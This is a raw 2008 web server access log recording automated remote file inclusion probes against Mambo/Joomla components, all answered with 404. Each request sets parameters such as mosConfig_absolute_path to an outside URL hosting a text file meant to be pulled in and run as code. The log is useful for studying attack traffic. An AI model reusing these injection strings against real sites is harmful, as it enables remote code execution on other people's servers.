201.22.6.28 - - [22/Oct/2008:00:39:44 -0400] "GET /logs/access_log.Q108101400//include/lib.inc.php?site_path=http://www.waterforlife.it/alb?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
222.128.244.119 - - [22/Oct/2008:00:39:47 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:47 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.119.155.214 - - [22/Oct/2008:00:39:48 -0400] "GET /logs/error_log.Q108040200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://outofthelair.com/safe1.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
222.128.244.119 - - [22/Oct/2008:00:39:50 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.110.217.58 - - [22/Oct/2008:00:39:50 -0400] "GET /logs/access_log.Q108081500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.128.244.119 - - [22/Oct/2008:00:39:53 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:54 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:57 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:58 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:01 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:02 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:05 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:08 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:14 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:14 -0400] "GET /logs/error_log.Q108071000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:17 -0400] "GET /logs/error_log.Q108071000//index2.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:19 -0400] "GET /logs/error_log.Q108071000//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:22 -0400] "GET /logs/error_log.Q108071000//mod_cbsms_messages.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:23 -0400] "GET /logs/error_log.Q108071000//modules/calendar/mod_calendar.php?absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:40:24 -0400] "GET /logs/error_log.Q108071000//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 279